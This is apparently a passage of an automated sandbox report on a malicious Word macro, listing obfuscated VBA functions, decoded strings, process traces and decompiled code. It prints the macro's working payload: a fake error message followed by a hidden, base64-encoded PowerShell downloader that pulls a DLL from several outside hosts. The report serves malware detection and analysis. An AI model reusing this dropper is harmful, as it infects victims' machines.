250	Set RjiQHRA = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
251	Dim mgrwfmN as Object
252	Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
253	mgrwfmN.WriteLine "ptABFEZDmkMVIeD"	WriteLine WriteLine WriteLine WriteLine WriteLine
254	mgrwfmN.WriteLine "vVbvIHcFGEAJJ"	WriteLine WriteLine WriteLine WriteLine WriteLine
255	mgrwfmN.WriteLine "NisSEYrcDlKQUITa"	WriteLine WriteLine WriteLine WriteLine WriteLine
256	Set MNihxICY = AiRdGDAJ	AiRdGDAJ AiRdGDAJ AiRdGDAJ AiRdGDAJ AiRdGDAJ
257	mgrwfmN.Close	Close Close Close Close Close
258	Set RjiQHRA = Nothing
259	Set wTMSLyWFG = AioOpBFE	AioOpBFE AioOpBFE AioOpBFE AioOpBFE AioOpBFE
260	Set mgrwfmN = Nothing
260	mgrwfmN:
262	End Function

Function Hrs2a1p95u19, APIs: 93, Strings: 11, Number of lines: 34, Relevance: 216.034

APIs	Meta Information
Pg5minli2d3c9
sreXHFD
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
eCIzUDyJ
Close
yJmmmVIAG
Replace	Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process Replace("]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAB]anw[3zAF]anw[3YAI]anw[3AAg]anw[3ACg]anw[3AIg]anw[3BLA]anw[3CIA]anw[3KwA]anw[3iAD]anw[3QAN]anw[3wBk]anw[3ACI]anw[3AKQ]anw[3AgA]anw[3CAA]anw[3KAB]anw[3bAH]anw[3QAW]anw[3QBQ]anw[3AGU]anw[3AXQ]anw[3AoA]anw[3CIA]anw[3ewA]anw[30AH]anw[30Ae]anw[3wAx]anw[3AH0]anw[3Aew]anw[3AwA]anw[3H0A]anw[3ewA]anw[3zAH]anw[30Ae]anw[3wAy]anw[3AH0]anw[3AIg]anw[3AtA]anw[3EYA]anw[3JwB]anw[3zAC]anw[3cAL]anw[3AAn]anw[3AHk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3jAF]anw[3QAb]anw[3wBy]anw[3AFk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3VAB]anw[3FAG]anw[30AL]anw[3gBJ]anw[3AG8]anw[3ALg]anw[3BEA]anw[3EkA]anw[3cgA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3ACc]anw[3AKQ]anw[3ApA]anw[3CAA]anw[3IAA]anw[37AC]anw[3AAI]anw[3AAg]anw[3ACA]anw[3AJA]anw[3BXA]anw[3GkA]anw[3OAA]anw[3gAD]anw[30AW]anw[3wB0]anw[3AHk]anw[3AUA]anw[3BlA]anw[3F0A]anw[3KAA]anw[3iAH]anw[3sAM]anw[3gB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3ANA]anw[3B9A]anw[3HsA]anw[3NgB]anw[39AH]anw[3sAN]anw[3QB9]anw[3AHs]anw[3AOA]anw[3B9A]anw[3HsA]anw[3MAB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BnA]anw[3EUA]anw[3UgA]anw[3nAC]anw[3wAJ]anw[3wAu]anw[3AE4]anw[3AZQ]anw[3B0A]anw[3C4A]anw[3UwB]anw[3FAF]anw[3IAV]anw[3gAn]anw[3ACw]anw[3AJw]anw[3BTA]anw[3FkA]anw[3cwA]anw[3nAC]anw[3wAJ]anw[3wBU]anw[3AGU]anw[3AJw]anw[3AsA]anw[3CcA]anw[3SQA]anw[3nAC]anw[3wAJ]anw[3wB0]anw[3AG0]anw[3AQQ]anw[3AnA]anw[3CwA]anw[3JwB]anw[3DAG]anw[3UAU]anw[3ABP]anw[3AEk]anw[3ATg]anw[3AnA]anw[3CwA]anw[3JwB]anw[3tAC]anw[3cAL]anw[3AAn]anw[3AE4]anw[3AYQ]anw[3AnA]anw[3CkA]anw[3IAA]anw[37AC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3AGk]anw[3AbA]anw[3BlA]anw[3G4A]anw[3dAA]anw[3nAC]anw[3sAJ]anw[3wBs]anw[3AHk]anw[3AJw]anw[3ApA]anw[3CsA]anw[3JwB]anw[3DAC]anw[3cAK]anw[3wAo]anw[3ACc]anw[3Abw]anw[3BuA]anw[3CcA]anw[3KwA]anw[3nAH]anw[3QAa]anw[3QAn]anw[3ACk]anw[3AKw]anw[3AnA]anw[3G4A]anw[3JwA]anw[3rAC]anw[3cAd]anw[3QBl]anw[3ACc]anw[3AKQ]anw[3A7A]anw[3CQA]anw[3TwB]anw[3sAD]anw[3kAb]anw[3wBu]anw[3AGs]anw[3AaQ]anw[3A9A]anw[3CQA]anw[3QwA]anw[3wAD]anw[3IAV]anw[3wAg]anw[3ACs]anw[3AIA]anw[3BbA]anw[3GMA]anw[3aAB]anw[3hAH]anw[3IAX]anw[3QAo]anw[3ADY]anw[3ANA]anw[3ApA]anw[3CAA]anw[3KwA]anw[3gAC]anw[3QAQ]anw[3QAw]anw[3ADM]anw[3AUA]anw[3A7A]anw[3CQA]anw[3SAA]anw[3yAD]anw[3cAW]anw[3AA9]anw[3ACg]anw[3AJw]anw[3BJA]anw[3CcA]anw[3KwA]anw[3oAC]anw[3cAN]anw[3gAn]anw[3ACs]anw[3AJw]anw[3A3A]anw[3FEA]anw[3JwA]anw[3pAC]anw[3kAO]anw[3wAg]anw[3ACA]anw[3AKA]anw[3BnA]anw[3GkA]anw[3IAA]anw[3oAC]anw[3IAV]anw[3gBh]anw[3AFI]anw[3AIg]anw[3ArA]anw[3CIA]anw[3aQB]anw[3BAE]anw[3IAT]anw[3ABl]anw[3ADo]anw[3Aaw]anw[3AiA]anw[3CsA]anw[3IgA]anw[30AD]anw[3cAZ]anw[3AAi]anw[3ACk]anw[3AIA]anw[3AgA]anw[3CkA]anw[3LgB]anw[32AG]anw[3EAT]anw[3AB1]anw[3AGU]anw[3AOg]anw[3A6A]anw[3CIA]anw[3QwB]anw[3yAE]anw[3UAY]anw[3ABB]anw[3AGA]anw[3AVA]anw[3BgA]anw[3EUA]anw[3RAB]anw[3JAF]anw[3IAZ]anw[3QBD]anw[3AFQ]anw[3AYA]anw[3BPA]anw[3FIA]anw[3eQA]anw[3iAC]anw[3gAJ]anw[3ABI]anw[3AE8]anw[3ATQ]anw[3BFA]anw[3CAA]anw[3KwA]anw[3gAC],"]anw[3",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAn
Ij2hesgjee57d3s0
uVItICICB
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
anyPG
Close
YVZXECEHD

Strings	Decrypted Strings
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs"
"CcDmClHsnCC"
"aqGiHISIbAoabV"
"nJJzFRjEWpRikxCD"
"]a""nw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD"
"syYTHJShrguhzb"
"TubioGUTLadgXbA"
"oLweAMoGsqVE"

Line	Instruction	Meta Information
263	Function Hrs2a1p95u19(Svk60sycz63sk)
264	Q491417n8n1 = Pg5minli2d3c9	Pg5minli2d3c9 executed
265	Goto uWZkeMFv
266	Dim zDsRaIBGF as Object
267	Set ViWsSIH = sreXHFD	sreXHFD
268	Set zDsRaIBGF = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
269	Dim uWZkeMFv as Object
270	Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")	CreateTextFile
271	uWZkeMFv.WriteLine "CcDmClHsnCC"	WriteLine
272	uWZkeMFv.WriteLine "aqGiHISIbAoabV"	WriteLine
273	uWZkeMFv.WriteLine "nJJzFRjEWpRikxCD"	WriteLine
274	Set QOrvJEB = eCIzUDyJ	eCIzUDyJ
275	uWZkeMFv.Close	Close
276	Set zDsRaIBGF = Nothing
277	Set UskmBJF = yJmmmVIAG	yJmmmVIAG
278	Set uWZkeMFv = Nothing
278	uWZkeMFv:
280	Hrs2a1p95u19 = Replace(Svk60sycz63sk, "]a" + "nw[3", Ij2hesgjee57d3s0)	Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process Ij2hesgjee57d3s0 executed
281	Goto iHKuDmaEr
282	Dim OMZxxg as Object
283	Set drZcHkCm = uVItICICB	uVItICICB
284	Set OMZxxg = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
285	Dim iHKuDmaEr as Object
286	Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")	CreateTextFile
287	iHKuDmaEr.WriteLine "syYTHJShrguhzb"	WriteLine
288	iHKuDmaEr.WriteLine "TubioGUTLadgXbA"	WriteLine
289	iHKuDmaEr.WriteLine "oLweAMoGsqVE"	WriteLine
290	Set noebIvSiu = anyPG	anyPG
291	iHKuDmaEr.Close	Close
292	Set OMZxxg = Nothing
293	Set NXbmIuHX = YVZXECEHD	YVZXECEHD
294	Set iHKuDmaEr = Nothing
294	iHKuDmaEr:
296	End Function

Module: Zdjtk46nm17voo

Declaration

Line	Content
1	Attribute VB_Name = "Zdjtk46nm17voo"

Reset < >

Analysis Process: powershell.exe PID: 1976 Parent PID: 2412 powershell.exeCOMMON

Executed Functions

Function 000007FF00272139, Relevance: .6, Instructions: 568COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2110153416.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b46ef2613fd86837a7b807dd9a1869d6a7edf96f85723b2362f94c96cbe2b525
Instruction ID: a4e55ab4c5b0b4681f0f57cdbfb453660d0f19fb55505929e97f9cde5cef5a50
Opcode Fuzzy Hash: b46ef2613fd86837a7b807dd9a1869d6a7edf96f85723b2362f94c96cbe2b525
Instruction Fuzzy Hash: C5D18B5195EBC64FE753973858667A17FF0AF17210F4A00EBD488CB0A3E94C5D8AC362

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF002708C0, Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2110153416.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7abda479021862f70bfb61d71f92d32d0dfa86dbc866c3486d29b52fc33e47e
Instruction ID: 23596c870b9380f52dd6f61fabb76ec5e15b7f6be9c57c27e9bec9137d794102
Opcode Fuzzy Hash: c7abda479021862f70bfb61d71f92d32d0dfa86dbc866c3486d29b52fc33e47e
Instruction Fuzzy Hash: C441AAA195E7C28FE75357345C652A17FB0AF23611B1A00E7D488CF0A3EA685D89C762

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF002723C5, Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2110153416.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7ca2e00248ba1cb991315646c58d84ef6929bef05092f09493b7c96e9bd0f6c
Instruction ID: 4eb174e376537380e895c5a678002e67cb21b71d9a42e02465d1fee741d56958
Opcode Fuzzy Hash: b7ca2e00248ba1cb991315646c58d84ef6929bef05092f09493b7c96e9bd0f6c
Instruction Fuzzy Hash: FD319A11A1EBC64FE753533818667B17FA0EF67211F4A00E7D488CB1A3E9495D99C3A2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2764 Parent PID: 2484 rundll32.exeCOMMON

Executed Functions

Function 00212C63, Relevance: 56.1, Strings: 44, Instructions: 1125
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00212C63() {
				char _v68;
				signed int _v72;
				char _v80;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _v112;
				signed int _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				unsigned int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				unsigned int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
